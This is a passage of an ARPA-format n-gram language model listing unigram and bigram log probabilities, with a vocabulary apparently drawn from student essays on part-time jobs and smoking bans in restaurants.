-3.9746375 drug -0.098042734
-3.9746375 You -0.098042734
-3.9746375 access -0.098042734
-3.9746375 24 -0.098042734
-3.8506508 win -0.098042734
-3.9746375 substantial -0.098042734
-3.9746375 prizes -0.098042734
-3.9746375 tournament -0.098042734
-3.9746375 grand -0.098042734
-3.9746375 incomplete -0.098042734
-3.9746375 Assuming -0.098042734
-3.9746375 worry -0.098042734
-3.9746375 invest -0.098042734
-3.9746375 respond -0.098042734
-3.9746375 proud -0.098042734
-3.9746375 plainly -0.098042734
-3.9746375 divided -0.098042734
-3.9746375 Troubles -0.098042734
-3.8506508 goals -0.098042734
-3.9746375 established -0.098042734
-3.9746375 applying -0.098042734
-3.9746375 brother -0.098042734
-3.8506508 dropped -0.098042734
-3.9746375 Northeastern -0.098042734
-3.9746375 Massachusetts -0.098042734
-3.9746375 majoring -0.098042734
-3.9746375 physics -0.098042734
-3.9746375 Disney -0.098042734
-3.9746375 holiday -0.098042734
-3.9746375 chances -0.098042734
-3.678229 partying -0.098042734
-3.9746375 serious -0.098042734
-3.9746375 budgeted -0.098042734
-3.9746375 stem -0.098042734
-3.9746375 funds -0.098042734
-3.9746375 100 -0.098042734
-3.9746375 distracts -0.098042734
-3.9746375 reasonable -0.098042734
-3.153469 restaurants -0.16573042
-3.9746375 whenever -0.098042734
-3.9746375 vicious -0.098042734
-3.9746375 postpone -0.098042734
-3.9746375 greal -0.098042734
-3.9746375 housework -0.098042734
-3.9746375 chores -0.098042734
-3.9746375 Governments -0.098042734
-3.4271748 ban -0.3119509
-3.9746375 employ -0.098042734
-3.9746375 Advising -0.098042734
-3.9746375 possess -0.098042734
-3.9746375 Mammon -0.098042734
-3.9746375 glittering -0.098042734
-3.9746375 bounty -0.098042734
-3.9746375 wrong-headed -0.098042734
-3.9746375 short-sighted -0.098042734
-3.9746375 Anyone -0.098042734
-3.9746375 known -0.098042734
-3.9746375 appreciates -0.098042734
-3.9746375 acquisition -0.098042734
-3.9746375 Interrupting -0.098042734
-3.9746375 headlong -0.098042734
-3.9746375 charge -0.098042734
-3.9746375 enlightenment -0.098042734
-3.9746375 demons -0.098042734
-3.8506508 man -0.098042734
-3.9746375 bursary -0.098042734
-3.9746375 Beware -0.098042734
-3.9746375 extol -0.098042734
-3.9746375 Their -0.098042734
-3.9746375 reckoning -0.098042734
-3.9746375 waking -0.098042734
-3.9746375 digesting -0.098042734
-3.9746375 dollops -0.098042734
-3.9746375 nourishing -0.098042734
-3.9746375 scholarship -0.098042734
-3.9746375 fed -0.098042734
-3.9746375 assistants -0.098042734
-3.9746375 coined -0.098042734
-3.9746375 dispensed -0.098042734
-3.9746375 mastered -0.098042734
-3.9746375 signs -0.098042734
-3.9746375 dancing -0.098042734
-3.9746375 raw -0.098042734
-3.9746375 cupidity -0.098042734
-3.9746375 corrupts -0.098042734
-3.9746375 soul -0.098042734
-3.9746375 contemplating -0.098042734
-3.9746375 materialist -0.098042734
-3.9746375 purchases -0.098042734
-3.9746375 disturbs -0.098042734
-3.9746375 Disrupting -0.098042734
-3.9746375 evolving -0.098042734
-3.9746375 relationship -0.098042734
-3.9746375 saddling -0.098042734
-3.9746375 questing -0.098042734
-3.8506508 minimum -0.098042734
-3.9746375 drudgery -0.098042734
-3.9746375 interfering -0.098042734
-3.9746375 ceaseless -0.098042734
-3.9746375 cogitation -0.098042734
-3.9746375 embraces -0.098042734
-3.9746375 obscene -0.098042734
-3.9746375 perversion -0.098042734
-3.9746375 holy -0.098042734
-3.9746375 Never -0.098042734
-3.9746375 Again -0.098042734
-3.9746375 carrels -0.098042734
-3.9746375 undivided -0.098042734
-3.8506508 attention -0.098042734
-3.9746375 across -0.098042734
-3.9746375 barricades -0.098042734
-3.9746375 gGreat -0.098042734
-3.9746375 Works -0.098042734
-3.8506508 \ -0.098042734
-3.9746375 rightly -0.098042734
-3.9746375 unread -0.098042734
-3.9746375 relentless -0.098042734
-3.9746375 racism -0.098042734
-3.9746375 misogyny -0.098042734
-3.9746375 cobblestones -0.098042734
-3.9746375 unite -0.098042734
-3.9746375 shape -0.098042734
-3.9746375 passing -0.098042734
-3.9746375 examinations -0.098042734
-3.9746375 stores -0.098042734
-3.9746375 awake -0.098042734
-3.9746375 failing -0.098042734
-3.9746375 asked -0.098042734
-3.9746375 obstructs -0.098042734
-3.9746375 discouraged -0.098042734
-3.9746375 tool -0.098042734
-3.9746375 sons -0.098042734
-3.9746375 daughters -0.098042734
-3.9746375 dreams -0.098042734
-3.9746375 dashed -0.098042734
-3.9746375 behalf -0.098042734
-3.9746375 hurting -0.098042734
-3.9746375 destroying -0.098042734
-3.9746375 low-skilled -0.098042734
-3.9746375 flip -0.098042734
-3.9746375 whatsoever -0.098042734
-3.9746375 pertain -0.098042734
-3.8506508 U.S. -0.098042734
-3.9746375 voice -0.098042734
-3.9746375 admitted -0.098042734
-3.9746375 Conversely -0.098042734
-3.9746375 speaking -0.098042734
-3.9746375 United -0.098042734
-3.9746375 States -0.098042734
-3.9746375 consuming -0.098042734
-3.9746375 commuting -0.098042734
-3.8506508 merely -0.098042734
-3.9746375 obligatory -0.098042734
-3.9746375 sustain -0.098042734
-3.9746375 existence -0.098042734
-3.678229 eat -0.098042734
-3.8506508 opposed -0.21423665
-3.9746375 taken-on -0.098042734
-3.9746375 compromised -0.098042734
-3.9746375 excellence -0.098042734
-3.8506508 finishing -0.098042734
-3.9746375 sake -0.098042734
-3.9746375 burdened -0.098042734
-3.9746375 fiscal -0.098042734
-3.9746375 none -0.098042734
-3.9746375 assume -0.098042734
-3.9746375 academically -0.098042734
-3.9746375 minded -0.098042734
-3.9746375 high-school -0.098042734
-3.9746375 focuses -0.098042734
-3.9746375 mastering -0.098042734
-3.9746375 foremost -0.098042734
-3.9746375 concepts -0.098042734
-3.9746375 detail -0.098042734
-3.8506508 depth -0.098042734
-3.9746375 analysis -0.098042734
-3.8506508 mundane -0.098042734
-3.678229 holding -0.17195599
-3.8506508 distract -0.098042734
-3.9746375 hamstring -0.098042734
-3.9746375 efficacy -0.098042734
-3.9746375 himself -0.098042734
-3.9746375 confident -0.098042734
-3.9746375 His -0.098042734
-3.9746375 plenty -0.098042734
-3.9746375 negatively -0.098042734
-3.9746375 term -0.098042734
-3.8506508 past -0.098042734
-3.9746375 father -0.098042734
-3.9746375 grandfather -0.098042734
-3.9746375 supply -0.098042734
-3.9746375 modest -0.098042734
-3.8506508 five -0.098042734
-3.9746375 wife -0.098042734
-3.9746375 carrying -0.098042734
-3.9746375 entrance -0.098042734
-3.9746375 work-force -0.098042734
-3.9746375 coupled -0.098042734
-3.8506508 near -0.098042734
-3.9746375 adequately -0.098042734
-3.9746375 four-year -0.098042734
-3.9746375 woman -0.098042734
-3.9746375 dedicating -0.098042734
-3.9746375 Achieving -0.098042734
-3.9746375 marks -0.098042734
-3.9746375 devoted -0.098042734
-3.9746375 safe-guarded -0.098042734
-3.9746375 maximum -0.098042734
-3.9746375 diluted -0.098042734
-3.8506508 worries -0.098042734
-3.9746375 associated -0.098042734
-3.9746375 hold-down -0.098042734
-3.9746375 Let -0.098042734
-3.9746375 ultimate -0.098042734
-3.9746375 anybody -0.098042734
-3.9746375 advances -0.098042734
-3.8506508 distracted -0.098042734
-3.9746375 falter -0.098042734
-3.9746375 schoolwork -0.098042734
-3.9746375 standing -0.098042734
-3.9746375 hurry -0.098042734
-3.9746375 pressured -0.098042734
-3.9746375 running -0.098042734
-3.9746375 overwhelmed -0.098042734
-3.9746375 strapped -0.098042734
-3.9746375 reliance -0.098042734
-3.9746375 behoove -0.098042734
-3.9746375 valid -0.098042734
-3.9746375 counter-argument -0.098042734
-3.9746375 paramount -0.098042734
-3.9746375 doctor -0.098042734
-3.9746375 tolerate -0.098042734
-3.9746375 repay -0.098042734
-3.9746375 seriously -0.098042734
-3.9746375 jeopardize -0.098042734
-3.9746375 coin -0.098042734
-3.9746375 vogue -0.098042734
-3.8506508 expression -0.098042734
-3.9746375 gI -0.098042734
-3.9746375 robbing -0.098042734
-3.9746375 Peter -0.098042734
-3.9746375 Paul -0.098042734
-3.9746375 h. -0.098042734
-3.9746375 rests -0.098042734
-3.9746375 onus -0.098042734
-3.9746375 innumerable -0.098042734
-3.9746375 enlightened -0.098042734
-3.9746375 18 -0.098042734
-3.9746375 liked -0.098042734
-3.8506508 nonetheless -0.098042734
-3.5348082 approach -0.098042734
-3.9746375 graduated -0.098042734
-3.9746375 bills -0.098042734
-3.9746375 smooth -0.098042734
-3.5348082 here -0.098042734
-3.9746375 started -0.098042734
-3.8506508 aside -0.098042734
-3.9746375 etime -0.098042734
-3.9746375 workloads -0.098042734
-3.9746375 volume -0.098042734
-3.9746375 shift -0.098042734
-3.9746375 afterwards -0.098042734
-3.9746375 ehealthy -0.098042734
-3.9746375 body -0.098042734
-3.9746375 rings -0.098042734
-3.9746375 fatigued -0.098042734
-3.9746375 over-exertion -0.098042734
-3.9746375 weekend -0.098042734
-3.9746375 availability -0.098042734
-3.9746375 negates -0.098042734
-3.9746375 5-day -0.098042734
-3.9746375 6 -0.098042734
-3.9746375 compounded -0.098042734
-3.9746375 single -0.098042734
-3.9746375 relaxation -0.098042734
-3.9746375 held -0.098042734
-3.9746375 relied -0.098042734
-3.9746375 else -0.098042734
-3.9746375 utilize -0.098042734
-3.9746375 Obliging -0.098042734
-3.9746375 detrimental -0.098042734
-3.9746375 outlook -0.098042734
-3.9746375 feelings -0.098042734
-3.9746375 depression -0.098042734
-3.9746375 pessimism -0.098042734
-3.9746375 honest -0.098042734
-3.9746375 hadn -0.098042734
-3.9746375 Indeed -0.098042734
-3.9746375 perspective -0.098042734
-3.9746375 Before -0.098042734
-3.9746375 30 -0.098042734
-3.9746375 hardly -0.098042734
-3.9746375 catch -0.098042734
-3.9746375 ended -0.098042734
-3.9746375 cars -0.098042734
-3.8506508 fancy -0.21423665
-3.9746375 cigarettes -0.098042734
-3.9746375 beer -0.098042734
-3.9746375 drop -0.098042734
-3.9746375 interviewed -0.098042734
-3.9746375 cared -0.098042734
-3.9746375 bartender -0.098042734
-3.9746375 impress -0.098042734
-3.9746375 anti-smoking -0.098042734
-3.9746375 lag -0.098042734
-3.8506508 significantly -0.098042734
-3.9746375 nations -0.098042734
-3.9746375 progress -0.098042734
-3.8506508 total -0.098042734
-2.7521589 smoking -0.20912977
-3.9746375 undoubtedly -0.098042734
-3.9746375 resistance -0.098042734
-3.8506508 restrictions -0.21423665
-3.9746375 Implementing -0.098042734
-3.9746375 represent -0.098042734
-3.9746375 opposite -0.098042734
-3.9746375 Between -0.098042734
-3.9746375 polar -0.098042734
-3.9746375 extremes -0.098042734
-3.9746375 route -0.098042734
-3.9746375 advisable -0.098042734
-3.9746375 urge -0.098042734
-2.9868817 smoke -0.20451537
-3.8506508 regardless -0.098042734
-3.9746375 well-being -0.098042734
-3.9746375 considering -0.098042734
-3.8506508 rights -0.098042734
-3.9746375 concerns -0.098042734
-3.678229 places -0.098042734
-3.9746375 partial -0.098042734
-3.4271748 banning -0.37108302
-3.9746375 implemented -0.098042734
-3.9746375 Restaurants -0.098042734
-3.9746375 legally -0.098042734
-3.9746375 compelled -0.098042734
-3.8506508 separate -0.098042734
-3.9746375 ventilated -0.098042734
-3.9746375 room -0.098042734
-3.8506508 patrons -0.098042734
-3.9746375 alternatively -0.098042734
-3.9746375 renovations -0.098042734
-3.678229 non-smoking -0.098042734
-3.9746375 establishment -0.098042734
-3.9746375 built -0.098042734
-3.9746375 facilities -0.098042734
-3.9746375 lax -0.098042734
-3.9746375 standards -0.098042734
-3.9746375 meal -0.098042734
-3.9746375 exposing -0.098042734
-3.9746375 cancer -0.098042734
-3.9746375 asthma -0.098042734
-3.9746375 respiratory -0.098042734
-3.9746375 worst -0.098042734
-3.9746375 sufferers -0.098042734
-3.8506508 ill -0.098042734
-3.5348082 effects -0.47831634
-3.9746375 Smoking -0.098042734
-3.9746375 alone -0.098042734
-3.9746375 kills -0.098042734
-3.9746375 hundreds -0.098042734
-3.9746375 sick -0.098042734
-3.9746375 nowadays -0.098042734
-3.8506508 everywhere -0.098042734
-3.9746375 Inside -0.098042734
-3.8506508 breathing -0.21423665
-3.9746375 appetite -0.098042734
-3.9746375 smells -0.098042734
-3.9746375 harm -0.098042734
-3.9746375 Nothing -0.098042734
-3.9746375 justify -0.098042734
-3.8506508 interference -0.098042734
-3.8506508 justified -0.098042734
-3.8506508 affect -0.098042734
-3.9746375 moral -0.098042734
-3.8506508 justification -0.098042734
-3.9746375 @ -0.098042734
-3.9746375 guide -0.098042734
-3.678229 choices -0.098042734
-3.9746375 warnings -0.098042734
-3.9746375 campaigns -0.098042734
-3.9746375 perfectly -0.098042734
-3.9746375 passive -0.098042734
-3.8506508 inhaling -0.098042734
-3.9746375 unknowingly -0.098042734
-3.9746375 affecting -0.098042734
-3.9746375 Banning -0.098042734
-3.9746375 premise -0.098042734
-3.9746375 rational -0.098042734
-3.9746375 employee -0.098042734
-3.9746375 UK -0.098042734
-3.9746375 parts -0.098042734
-3.9746375 US -0.098042734
-3.9746375 conscious -0.098042734
-3.9746375 citizens -0.098042734
-3.9746375 despite -0.098042734
-3.9746375 infringement -0.098042734
-3.678229 second-hand -0.35337758
-3.5348082 non-smokers -0.1522653
-3.9746375 Family -0.098042734
-3.9746375 prone -0.098042734
-3.5348082 smokers -0.14086568
-3.9746375 Keeping -0.098042734
-3.9746375 smoke-free -0.098042734
-3.9746375 occur -0.098042734
-3.9746375 Putting -0.098042734
-3.9746375 potentially -0.098042734
-3.9746375 unwanted -0.098042734
-3.8506508 exposure -0.21423665
-3.678229 tobacco -0.098042734
-3.9746375 air -0.098042734
-3.9746375 definite -0.098042734
-3.9746375 served -0.098042734
-3.9746375 smell -0.098042734
-3.9746375 entangled -0.098042734
-3.9746375 tell -0.098042734
-3.9746375 tastes -0.098042734
-3.8506508 altogether -0.21423665
-3.9746375 Smokers -0.098042734
-3.9746375 welfare -0.098042734
-3.9746375 includes -0.098042734
-3.9746375 Tobacco -0.098042734
-3.8506508 poison -0.098042734
-3.9746375 anywhere -0.098042734
-3.9746375 close -0.098042734
-3.9746375 permeates -0.098042734
-3.9746375 foods -0.098042734
-3.9746375 breathe -0.098042734
-3.9746375 alters -0.098042734
-3.9746375 habit-forming -0.098042734
-3.9746375 stimulant -0.098042734
-3.9746375 react -0.098042734
-3.9746375 violently -0.098042734
-3.9746375 Customers -0.098042734
-3.9746375 heard -0.098042734
-3.8506508 smoky -0.098042734
-3.9746375 fair -0.098042734
-3.9746375 Restaurant -0.098042734
-3.9746375 Regular -0.098042734
-3.9746375 withdrawal -0.098042734
-3.9746375 pains -0.098042734
-3.9746375 addicted -0.098042734
-3.9746375 Exposing -0.098042734
-3.9746375 insult -0.098042734
-3.9746375 safety -0.098042734
-3.9746375 selfish -0.098042734
-3.9746375 implementing -0.098042734
-3.9746375 examined -0.098042734
-3.9746375 concerning -0.098042734
-3.9746375 Principally -0.098042734
-3.8506508 wise -0.098042734
-3.8506508 forced -0.21423665
-3.9746375 compromise -0.098042734
-3.9746375 regarding -0.098042734
-3.9746375 lifestyles -0.098042734
-3.9746375 discourage -0.098042734
-3.9746375 importantly -0.098042734
-3.9746375 account -0.098042734
-3.9746375 smoke-filled -0.098042734
-3.9746375 ignored -0.098042734
-3.9746375 long-term -0.098042734
-3.9746375 national -0.098042734
-3.9746375 healthcare -0.098042734
-3.9746375 treatment -0.098042734
-3.9746375 tobacco-related -0.098042734
-3.9746375 illnesses -0.098042734
-3.9746375 context -0.098042734
-3.9746375 firstly -0.098042734
-3.9746375 promote -0.098042734
-3.9746375 comfort -0.098042734
-3.9746375 diners -0.098042734
-3.9746375 proven -0.098042734
-3.9746375 amongst -0.098042734
-3.9746375 ages -0.098042734
-3.9746375 pastime -0.098042734
-3.9746375 deeply -0.098042734
-3.9746375 integrated -0.098042734
-3.9746375 passively -0.098042734
-3.9746375 contracting -0.098042734
-3.9746375 illness -0.098042734
-3.9746375 severe -0.098042734
-3.9746375 profits -0.098042734
-3.9746375 introduce -0.098042734
-3.9746375 sections -0.098042734
-3.9746375 segregate -0.098042734
-3.9746375 suits -0.098042734
-3.9746375 succeed -0.098042734
-3.9746375 gradually -0.098042734
-3.9746375 improving -0.098042734
-3.9746375 clearly -0.098042734
-3.9746375 harmful -0.098042734
-3.9746375 secondhand -0.098042734
\2-grams:
-0.0012649981 . </s> 0
-0.05949721 ? </s> 0
-2.1446047 -RRB- </s> 0
-0.12845917 ! </s> 0
-1.7663178 individual </s> 0
-1.0685297 <s> I -0.41439435
-1.6155277 reasons I -0.11268411
-2.3118994 that I -0.13618872
-2.1031294 job I -0.04895735
-1.3998553 , I -0.22112566
-2.0044537 and I -0.048957378
-1.6042035 as I -0.048957378
-1.3682404 reason I -0.048957378
-2.673871 students I -0.048957378
-0.9847774 Therefore I -0.048957378
-1.9911177 then I -0.187397
-2.544403 college I -0.048957378
-1.7705758 And I -0.048957378
-2.1540918 so I -0.048957378
-1.2360636 : I -0.048957378
-1.6455997 employers I -0.048957378
-1.8020827 like I -0.048957378
-1.2064477 when I -0.11268411
-1.6699961 what I -0.048957378
-2.068887 could I -0.048957378
-1.1479716 because I -0.048957378
-1.9872543 If I -0.048957378
-0.8012204 whatever I -0.048957378
-1.7496611 responsibilities I -0.048957378
-1.596395 which I -0.048957378
-1.5678455 however I -0.048957378
-1.9402759 where I -0.048957378
-0.9847774 extent I -0.048957378
-1.5031465 So I -0.048957378
-1.2753446 Perhaps I -0.048957378
-1.8586221 think I -0.048957378
-1.0509765 why I -0.13618872
-1.1556058 Australia I -0.048957378
-0.9847774 summary I -0.048957378
-0.6890748 Overall I -0.048957378
-1.2753446 When I -0.04895735
-0.6890748 justice I -0.048957378
-1.282293 wish I -0.048957378
-0.9847774 U.S. I -0.048957378
-2.7368789 I disagree -0.37097517
-0.99501497 partially disagree -0.048957378
-0.7942637 disagree with -0.70552063
-2.2168078 student with -0.048957378
-2.002276 , with -0.048957378
-1.413362 case with -0.048957378
-2.277343 in with -0.048957378
-2.114054 and with -0.04895735
-1.8664051 working with -0.048957378
-1.6857973 students with -0.04895735
-2.3546855 time with -0.048957378
-2.1668954 jobs with -0.048957378
-2.3388495 work with -0.13618872
-0.3862648 agree with -0.70552063
-1.4221039 begin with -0.048957378
-2.2686563 are with -0.048957378
-1.52707 experiences with -0.048957378
-0.9731246 team with -0.048957378
-1.408685 productive with -0.048957378
-0.93599224 relationships with -0.048957378
-2.1311364 people with -0.048957378
-1.5142454 true with -0.048957378
-1.5826072 help with -0.04895735
-2.1114128 do with -0.048957378
-0.6831375 familiar with -0.048957378
-0.40507883 interfere with -0.187397
-1.8622386 activities with -0.048957378
-1.7455719 life with -0.187397
-1.4935277 up with -0.048957378
-0.6831375 combines with -0.048957378
-1.7117923 income with -0.048957378
-1.7904192 living with -0.048957378
-0.9731246 communicate with -0.048957378
-1.52707 responsible with -0.048957378
-0.9731246 flexible with -0.048957378
-0.9731246 fill with -0.048957378
-0.6831375 cope with -0.048957378
-1.4540396 out with -0.04895735
-1.7978033 those with -0.048957378
-0.9731246 comparison with -0.048957378
-1.4658345 problem with -0.048957378
-1.5560237 families with -0.048957378
-1.7279987 day with -0.048957378
-0.7942637 drinking with -0.048957378
-0.6831375 association with -0.048957378
-0.6831375 remain with -0.048957378
-0.9731246 organized with -0.048957378
-1.1384469 basis with -0.048957378
-0.6831375 Along with -0.048957378
-1.1384469 schedules with -0.048957378
-1.5187173 complete with -0.048957378
-0.6831375 along with -0.048957378
-1.56482 spent with -0.048957378
-0.6831375 interact with -0.048957378
-0.6831375 interacting with -0.048957378
-1.5603997 me with -0.048957378
-1.2528772 schedule with -0.048957378
-0.6831375 continued with -0.048957378
-0.6831375 efficiently with -0.048957378
-0.6831375 helping with -0.048957378
-0.2700946 dealing with -0.13332285
-0.9731246 communicating with -0.048957378
-0.6831375 oneself with -0.048957378
-1.408685 habits with -0.048957378
-0.6831375 tie-in with -0.048957378
-0.9731246 claim with -0.048957378
-0.6831375 cooperation with -0.048957378
-0.9731246 wrong with -0.048957378
-0.6831375 bonus with -0.048957378
-0.6831375 interferes with -0.048957378
-0.6831375 trapped with -0.048957378
-0.6831375 boom with -0.048957378
-1.8179587 restaurants with -0.048957378
-0.6831375 relationship with -0.048957378
-0.6831375 interfering with -0.048957378
-0.6831375 burdened with -0.048957378
-0.6831375 coupled with -0.048957378
-0.6831375 diluted with -0.048957378
-0.6831375 associated with -0.048957378
-0.6831375 rests with -0.048957378
-0.6831375 held with -0.048957378
-0.6831375 interviewed with -0.048957378
-0.6831375 implemented with -0.048957378
-0.6831375 entangled with -0.048957378
-2.0696561 with this -0.73184955
-2.0768657 for this -0.1722646
-2.4861102 job this -0.048957378
-1.6605835 upon this -0.048957378
-2.0597382 , this -0.08422062
-1.9358038 In this -0.048957378
-1.856033 in this -0.099168696
-2.4482787 and this -0.048957378
-1.9986331 of this -0.048957378
-2.6253626 to this -0.048957378
-1.7144383 For this -0.27955192
-2.3825915 from this -0.048957378
-2.5046253 on this -0.048957378
-1.9938124 then this -0.048957378
-1.5521976 but this -0.048957378
-1.5063467 consider this -0.048957378
-1.9040649 at this -0.048957378
-1.9318298 doing this -0.048957378
-2.2408266 do this -0.13618872
-1.9063913 believe this -0.048957378
-1.3712003 during this -0.048957378
-0.68921393 maintain this -0.048957378
-1.8533039 support this -0.048957378
-1.5063467 feel this -0.048957378
-1.1584141 ease this -0.048957378
-1.3677793 though this -0.048957378
-1.2758812 Perhaps this -0.048957378
-1.6058056 since this -0.048957378
-1.6058056 why this -0.048957378
-0.68921393 admit this -0.048957378
-1.374476 realize this -0.048957378
-0.9850521 recognize this -0.048957378
-1.3677793 certainly this -0.048957378
-0.9850521 Doing this -0.048957378
-0.68921393 Interrupting this -0.048957378
-0.68921393 Disrupting this -0.048957378
-0.9850521 distract this -0.048957378
-0.68921393 Keeping this -0.048957378
-2.4409037 this statement -0.38603142
-2.85306 the statement -0.11268411
-2.3608074 The statement -0.048957378
-1.294531 above statement -0.048957378
-2.5278392 <s> for -0.048957378
-1.0219545 statement for -0.13332285
-1.0779753 reasons for -0.1722646
-2.2203712 that for -0.048957378
-1.5585953 job for -0.048957378
-1.9413155 is for -0.04895735
-0.17291874 preparation for -0.048957378
-1.5266267 full-time for -0.048957378
-2.0927892 will for -0.048957378
-1.7022598 , for -0.19825454
-2.0568473 not for -0.048957378
-2.114417 and for -0.048957378
-2.3022451 to for -0.048957378
-1.944184 study for -0.048957378
-1.5204926 studying for -0.048957378
-1.7073846 experience for -0.048957378
-1.3835486 working for -0.048957378
-0.6986842 reason for -0.048957378
-1.6065047 time for -0.08422062
-1.9452095 school for -0.048957378
-2.1568348 work for -0.048957378
-1.774954 -LRB- for -0.048957378
-1.8295575 but for -0.048957378
-1.5234151 only for -0.04895735
-0.7025396 necessary for -0.048957378
-0.598935 pay for -0.07613316
-1.4443347 fees for -0.048957378
-1.2561064 money for -0.048957378
-1.6203611 And for -0.048957378
-1.0219545 bad for -0.187397
-1.1141013 market for -0.048957378
-1.4229276 does for -0.048957378
-1.7952361 even for -0.048957378
-0.572456 foundation for -0.048957378
-0.95634013 history for -0.048957378
-0.95634013 candidate for -0.048957378
-1.3513856 better for -0.048957378
-2.0051796 skills for -0.048957378
-0.69287807 important for -0.6495775
-1.4366772 issue for -0.048957378
-1.7528588 enough for -0.048957378
-1.3670125 need for -0.048957378
-1.3944039 good for -0.11268411
-1.1182201 idea for -0.04895735
-1.8215423 parents for -0.048957378
-1.4584918 true for -0.048957378
-1.9731671 do for -0.048957378
-1.3862062 chance for -0.048957378
-0.5652439 opportunity for -0.048957378
-1.0617472 them for -0.13332285
-1.5087376 useful for -0.048957378
-0.97337675 done for -0.048957378
-1.2296209 fit for -0.048957378
-1.9170562 get for -0.048957378
-0.6744481 unprepared for -0.048957378
-1.6189606 responsibilities for -0.048957378
-1.3862062 used for -0.048957378
-1.3643708 late for -0.048957378
-1.5915792 difficult for -0.048957378
-1.2214524 cash for -0.048957378
-1.6321046 income for -0.048957378
-1.6691784 way for -0.048957378
-0.6640692 responsible for -0.04895735
-1.2214524 arguments for -0.048957378
-1.1141013 '' for -0.048957378
-0.97991747 value for -0.048957378
-0.6744481 passion for -0.048957378
-1.4584918 great for -0.048957378
-0.95634013 stand for -0.048957378
-1.1141013 contacts for -0.048957378
-1.4584918 best for -0.048957378
-1.1141013 matter for -0.048957378
-1.2214524 him for -0.048957378
-1.7452198 hard for -0.048957378
-1.4229276 Working for -0.048957378
-1.1141013 material for -0.048957378
-1.2214524 concern for -0.048957378
-1.3014593 hold for -0.048957378
-0.6744481 traverse for -0.048957378
-1.3537269 things for -0.048957378
-0.6744481 paying for -0.048957378
-1.3014593 rent for -0.048957378
-1.4584918 made for -0.048957378
-0.95634013 ready for -0.048957378
-1.6564035 day for -0.048957378
-0.95634013 lost for -0.048957378
-1.198989 responsibility for -0.04895735
-0.6744481 identity for -0.048957378
-0.6744481 handle for -0.048957378
-1.5018239 independence for -0.048957378
-1.2214524 positive for -0.048957378
-1.1141013 common for -0.048957378
-0.95634013 applications for -0.048957378
-0.69226825 possibilities for -0.048957378
-0.6744481 aptitude for -0.048957378
-1.1141013 basis for -0.048957378
-1.3643708 around for -0.048957378
-0.7841116 essential for -0.048957378
-1.1141013 budget for -0.048957378
-1.1141013 distraction for -0.048957378
-0.95634013 conditions for -0.048957378
-0.6744481 excuses for -0.048957378
-1.1942735 right for -0.048957378
-1.4366772 save for -0.048957378
-0.69226825 respect for -0.048957378
-1.3014593 policy for -0.048957378
-0.95634013 mainly for -0.048957378
-1.1141013 prepare for -0.187397
-0.6744481 prepared for -0.048957378
-1.1141013 critical for -0.048957378
-0.6744481 empathy for -0.048957378
-0.786483 required for -0.048957378
-0.6744481 replacement for -0.048957378
-0.6744481 struggle for -0.048957378
-0.7841116 look for -0.04895735
-0.6744481 looking for -0.048957378
-1.1141013 expense for -0.048957378
-1.1141013 loan for -0.048957378
-1.3093133 materials for -0.048957378
-1.1141013 low for -0.048957378
-1.1226108 rewarding for -0.048957378
-1.2214524 wanted for -0.048957378
-0.6744481 options for -0.048957378
-0.6744481 grandparents for -0.048957378
-0.6744481 exchange for -0.048957378
-0.6744481 arrange for -0.048957378
-0.572456 paid for -0.048957378
-0.6744481 Searching for -0.048957378
-0.6744481 begging for -0.048957378
-0.6744481 traumatizing for -0.048957378
-0.6744481 bond for -0.048957378
-0.6744481 dogs for -0.048957378
-0.6744481 ideal for -0.048957378
-0.6744481 disparate for -0.048957378
-0.6744481 applying for -0.048957378
-0.6744481 chances for -0.048957378
-0.6744481 charge for -0.048957378
-0.6744481 tool for -0.048957378
-0.95634013 finishing for -0.048957378
-0.6744481 carrying for -0.048957378
-0.6744481 availability for -0.048957378
-1.789221 smoke for -0.048957378
-0.6744481 room for -0.048957378
-0.95634013 justification for -0.048957378
-0.95634013 smoky for -0.048957378
-0.6744481 treatment for -0.048957378
-1.9351243 for several -0.40449065
-2.7689722 be several -0.048957378
-3.2900462 , several -0.048957378
-1.7594332 For several -0.048957378
-2.3036728 are several -0.048957378
-1.6385572 offer several -0.048957378
-2.353659 do several -0.048957378
-1.5323278 waste several -0.048957378
-1.8572801 had several -0.048957378
-0.77503145 several reasons -0.25144583
-2.7172563 the reasons -0.048957378
-2.3028388 many reasons -0.048957378
-2.6201468 of reasons -0.13618872
-2.2887797 The reasons -0.048957378
-1.9765648 financial reasons -0.048957378
-1.6304226 following reasons -0.13618872
-1.8151026 more reasons -0.048957378
-0.3378226 two reasons -0.12260215
-1.0582707 main reasons -0.048957378
-2.1772497 these reasons -0.2403142
-1.3826258 various reasons -0.048957378
-0.475587 three reasons -0.099168696
-2.3262591 my reasons -0.048957378
-1.2878569 above reasons -0.187397
-0.9911411 excellent reasons -0.048957378
-2.0520139 <s> . -0.048957378
-1.1706125 disagree . -0.048957378
-1.2696567 this . -0.50140065
-1.3076993 statement . -0.40449065
-1.6404672 for . -0.27955192
-0.7386445 reasons . -0.9485587
-1.0515057 it . -0.8024306
-1.8675882 part-time . -0.048957378
-1.0911365 job . -1.3934952
-1.7278584 is . -0.27955192
-1.2126651 student . -0.70552063
-0.45037383 graduation . -0.75667316
-1.619139 not . -0.048957378
-0.8031024 case . -0.27955192
-0.5351286 employment . -0.70552063
-1.7663496 in . -0.187397
-0.6888471 field . -0.50140065
-1.8240277 to . -0.048957378
-0.9988124 study . -0.9485587
-0.79016376 studying . -0.6475287
-1.0946081 engineering . -0.048957378
-0.81913006 experience . -0.8024306
-1.6405205 from . -0.048957378
-1.0953617 working . -0.5805819
-1.0626299 restaurant . -0.27955192
-1.6075702 there . -0.048957378
-1.1786642 students . -1.0065507
-0.8031024 stress . -0.187397
-1.6347525 on . -0.187397
-0.65351653 studies . -0.9485587
-1.1859628 time . -0.8024306
-1.3356895 jobs . -1.12465
-1.5887046 one . -0.048957378
-1.1706125 tired . -0.048957378
-1.416219 focus . -0.048957378
-0.63527 school . -0.9785219
-1.0798451 work . -1.0065507
-0.6345344 produced . -0.048957378
-1.6440349 such . -0.048957378
-0.950476 -RRB- . -0.50140065
-1.1966463 pursuing . -0.048957378
-1.7191901 should . -0.048957378
-1.416219 necessary . -0.048957378
-1.0604573 college . -1.0811843
-1.6987075 have . -0.048957378
-0.8696997 money . -1.0577031
-1.2445956 say . -0.048957378
-1.4950117 you . -0.048957378
-1.5677115 some . -0.048957378
-1.3076993 bad . -0.187397
-1.2445956 begin . -0.048957378
-1.2723796 today . -0.048957378
-0.9397725 degree . -0.187397
-0.8260182 well . -0.70552063
-1.6063483 are . -0.048957378
-0.52723414 career . -0.5805819
-0.63132155 experiences . -0.27955192
-1.2941535 offer . -0.048957378
-0.9457105 benefit . -0.187397
